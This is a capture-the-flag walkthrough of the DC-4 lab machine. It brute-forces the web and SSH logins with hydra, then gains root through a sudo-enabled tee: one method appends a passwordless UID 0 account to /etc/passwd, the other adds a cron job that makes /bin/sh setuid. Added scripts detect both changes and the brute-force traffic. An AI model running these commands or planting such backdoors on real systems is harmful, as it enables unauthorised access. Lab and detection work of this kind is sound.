DC-4: Penetration Test Walkthrough
Date: 2022-07-22
This article walks through a penetration test of the DC-4 target machine: the steps taken, the techniques applied, the basic points worth remembering and the things to watch out for. It should be a useful reference for anyone working on the same box.
About the target
This exercise is about hunting for the flags on the target machine, with the final flag as the goal. Download: http://www.five86.com/dc-4.html
Reconnaissance
Start with an nmap scan:
nmap -sV -A 172.16.0.16 -oN dc.nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:93:30:DE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ports 22 and 80 are open on a Linux host. The web service is a login form, so the options are an authentication-bypass ("universal") password, SQL injection, or brute force.
Exploitation
- The page says it is an admin login, so brute-force with the admin username directly.
- hydra or Burp Suite both work; hydra is used here:
hydra -l admin -P /usr/share/john/password.lst -f 172.16.0.16 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -vV
[VERBOSE] Page redirected to http://172.16.0.16/index.php
[VERBOSE] Page redirected to http://172.16.0.16/index.php
[VERBOSE] Page redirected to http://172.16.0.16/index.php
[80][http-post-form] host: 172.16.0.16 login: admin password: happy
[STATUS] attack finished for 172.16.0.16 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
- The username and password drop out immediately.
- At the same time, run a quick sqlmap test to see whether the form is injectable:
sqlmap -u http://172.16.0.16/ --data "username=admin&password=admin" --thread 10 --batch --dbs
No injection vulnerability is found.
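On the defender's side, a brute-force run like the one above is visible in the web server's access log as a burst of POST requests to /login.php that each end in the 302 redirect back to index.php that hydra reported for failed attempts. The script below is an added example, not part of the original write-up: it counts those failed POSTs per client address over a constructed nginx combined-format log sample (the addresses, timestamps and user agents are made up for the demo) and reports any client above a threshold.

```shell
#!/bin/sh
# Added example (not from the original write-up). Constructed nginx
# "combined" access-log sample: one normal visitor (172.16.0.5) and one
# client hammering the login form (172.16.0.9). Values are made up.
SAMPLE_LOG='172.16.0.5 - - [22/Jul/2022:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 1041 "-" "Mozilla/5.0"
172.16.0.5 - - [22/Jul/2022:10:00:09 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
172.16.0.9 - - [22/Jul/2022:10:01:00 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"
172.16.0.9 - - [22/Jul/2022:10:01:00 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"
172.16.0.9 - - [22/Jul/2022:10:01:01 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"
172.16.0.9 - - [22/Jul/2022:10:01:01 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"
172.16.0.9 - - [22/Jul/2022:10:01:02 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"
172.16.0.9 - - [22/Jul/2022:10:01:02 +0800] "POST /login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (Hydra)"'

# failed_login_bursts LOGTEXT LIMIT
# Prints "ip count" for every client whose failed logins (POST /login.php
# answered with a 302 redirect, as seen in the hydra output) exceed LIMIT.
# Combined-format fields: $1 client IP, $6 "METHOD, $7 path, $9 status.
failed_login_bursts() {
    printf '%s\n' "$1" | awk -v limit="$2" '
        $6 == "\"POST" && $7 == "/login.php" && $9 == 302 { fails[$1]++ }
        END { for (ip in fails) if (fails[ip] > limit) print ip, fails[ip] }
    ' | sort
}

# On a real host: failed_login_bursts "$(cat /var/log/nginx/access.log)" 20
failed_login_bursts "$SAMPLE_LOG" 3
```

The same awk filter works on a live log with a higher threshold; a rate-limit rule in nginx keyed on the same request pattern is the matching mitigation.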
- Log in to the back end with the recovered credentials. There is a command-execution window, and it reveals 4 users:
root charles jim sam
- Inspect the home directories; only jim's contains any files:
You have selected: ls -R /home/
/home/:
charles
jim
sam
/home/charles:
/home/jim:
backups
mbox
test.sh
/home/jim/backups:
old-passwords.bak
/home/sam:
- old-passwords.bak is an old password list, presumably provided for brute-forcing SSH.
- mbox suggests there is mail to read.
- Use the password list to brute-force SSH:
hydra -L users.txt -P jimpass.txt ssh://172.16.0.16 -t 6 -f -vV
- This gives user jim with password jibril04. Logging in over SSH, the login banner mentions mail; /var/mail holds a message from charles containing his password:
[22][ssh] host: 172.16.0.16 login: jim password: jibril04
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charle
- test.sh turns out to be a small script; presumably it becomes useful later:
jim@dc-4:~$ cat test.sh
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."
- Routine enumeration: su is setuid, but jim has no sudo rights:
jim@dc-4:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
jim@dc-4:~$ sudo -l
[sudo] password for jim:
Sorry, user jim may not run sudo on dc-4.
- Switch to the charles user; sudo -l shows that teehee can be run as root without a password:
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
- Check how teehee is used: its help text is that of GNU tee, a command that copies its input to files, and with -a it appends:
charles@dc-4:~$ teehee --h
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
- Privilege escalation: use teehee to append content to root-owned files and obtain root.
- Method 1: add a new user to /etc/passwd with the same privileges as root. The password field is left empty and UID/GID are 0:
echo "admin::0:0:admin::/bin/bash" | sudo teehee -a /etc/passwd
# [username]:[password]:[UID]:[GID]:[description]:[home directory]:[login shell]
- This gives root directly, and the final flag file can be read.
- Method 2: write a cron job. First inspect /etc/crontab:
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
All time fields are *, so the job runs every minute. The scheduled command changes the permissions of /bin/sh to 4777, so a non-root user can run it and it executes with root privileges.
- Because teehee runs under sudo, the cron entry is written as root; once it fires, root is obtained.
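Both escalation methods leave clear artefacts that a host audit can catch: a second UID 0 account or an empty password field in /etc/passwd, and a system crontab entry that sets the setuid bit on a shell. The script below is an added example, not part of the original write-up; it builds constructed sample copies of the two files in a temporary directory and runs the checks over them, so the functions can be pointed at the real /etc/passwd and /etc/crontab on a live host.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit checks for the two
# changes made with `sudo teehee -a` above. The sample files are constructed
# here; on a real host pass /etc/passwd and /etc/crontab instead.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
admin::0:0:admin::/bin/bash
EOF

cat > "$WORK/crontab" <<'EOF'
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root chmod 4777 /bin/sh
EOF

# suspicious_passwd_entries PASSWD_FILE
# Prints the name of every account that is UID 0 but not root, or whose
# password field is empty (anyone can su to it with no password).
suspicious_passwd_entries() {
    awk -F: '($3 == 0 && $1 != "root") || $2 == "" { print $1 }' "$1"
}

# suspicious_cron_entries CRONTAB_FILE
# Prints cron lines whose command sets the setuid bit (numeric 4xxx mode or
# a symbolic +s), the pattern used to turn /bin/sh into a root backdoor.
suspicious_cron_entries() {
    grep -E 'chmod[[:space:]]+(4[0-7]{3}|[ugoa]*\+[rwx]*s)' "$1"
}

suspicious_passwd_entries "$WORK/passwd"
suspicious_cron_entries "$WORK/crontab"
```

Pairing these checks with file-integrity monitoring on /etc/passwd and /etc/crontab, and removing the NOPASSWD tee rule from sudoers, closes the path used here.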
Contents of the final flag file:
root@dc-4:/root# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.